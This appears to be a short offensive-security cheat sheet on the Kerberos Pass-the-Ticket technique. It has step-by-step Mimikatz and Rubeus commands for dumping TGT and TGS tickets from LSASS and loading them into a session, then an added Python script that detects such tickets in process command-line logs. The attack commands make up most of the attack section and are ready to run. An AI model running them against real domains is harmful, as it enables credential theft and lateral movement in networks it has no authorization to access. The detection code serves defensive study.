Pass The Ticket
Pass the Ticket consists of using a Kerberos TGT or TGS ticket to authenticate. The tickets are extracted from the LSASS process. Administrator privileges are required to extract other users' tickets; otherwise only your own can be extracted.
Ticket Extraction (Mimikatz)
.\mimikatz.exe
> privilege::debug
> sekurlsa::tickets /export
Exported files are named [randomvalue]-username@service-domain.kirbi; a ticket whose service is krbtgt is a TGT.
Upload Ticket
Load the ticket into the current session (as if it were a cookie)
> kerberos::ptt "<FILE.kirbi>"
> misc::cmd
Ticket Extraction (Rubeus)
Rubeus.exe dump /nowrap # tickets are printed in base64
Upload Ticket
Load the ticket into the current session (as if it were a cookie)
Rubeus.exe ptt /ticket:<BASE64_TICKET>
Rubeus.exe ptt /ticket:<FILE.kirbi> # obtained from mimikatz
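For detection, both ticket forms used above are recognizable in process command-line logs: the .kirbi naming convention, and base64 that decodes to a KRB-CRED structure (RFC 4120) regardless of the tool's name. The Python below is an added example, not part of the original page; the function names are hypothetical, and the log lines and ticket bytes are constructed samples.

```python
import base64
import re

# DER bytes for pvno [0] INTEGER 5 and msg-type [1] INTEGER 22, which open
# the body of every KRB-CRED message (RFC 4120), the .kirbi file format.
KRB_CRED_FIELDS = bytes.fromhex("a003020105a103020116")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}")
KIRBI_NAME = re.compile(r"@([^-@\s\"]+)-([^\s\"]+?)\.kirbi", re.I)

def _skip_header(data, pos, tag):
    """Return the offset just past a DER tag+length header, or -1 on mismatch."""
    if pos + 2 > len(data) or data[pos] != tag:
        return -1
    first = data[pos + 1]
    return pos + 2 + (first & 0x7F if first & 0x80 else 0)

def is_krb_cred(blob):
    """True if blob begins [APPLICATION 22] SEQUENCE { pvno 5, msg-type 22 ..."""
    pos = _skip_header(blob, 0, 0x76)
    if pos < 0:
        return False
    pos = _skip_header(blob, pos, 0x30)
    return pos > 0 and blob.startswith(KRB_CRED_FIELDS, pos)

def ticket_indicators(command_line):
    """List Kerberos ticket material referenced by one process command line."""
    hits = []
    for service, realm in KIRBI_NAME.findall(command_line):
        kind = "TGT" if service.lower() == "krbtgt" else "service ticket"
        hits.append(f"kirbi file: {kind} for {service} in {realm}")
    for run in B64_RUN.findall(command_line):
        # 32 base64 characters decode to 24 bytes, enough for the fixed header
        if is_krb_cred(base64.b64decode(run[:32])):
            hits.append(f"inline base64 KRB-CRED ({len(run)} chars)")
    return hits

# Constructed samples: a fake header padded with zero bytes, not a real ticket.
SAMPLE_BLOB = base64.b64encode(
    bytes.fromhex("76820100308200fc") + KRB_CRED_FIELDS + bytes(30)).decode()
SAMPLE_LINES = [
    "Rubeus.exe ptt /ticket:" + SAMPLE_BLOB,
    'renamed.exe "kerberos::ptt C:\\Temp\\[0;3e7]-alice@krbtgt-CORP.EXAMPLE.kirbi"',
    "powershell.exe -EncodedCommand "
    + base64.b64encode("Get-ChildItem C:\\".encode("utf-16-le")).decode(),
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(ticket_indicators(line), "<-", line[:60])
```

The third sample line is a benign base64 argument and produces no hit, because the check validates the decoded ASN.1 header rather than matching on base64 alone.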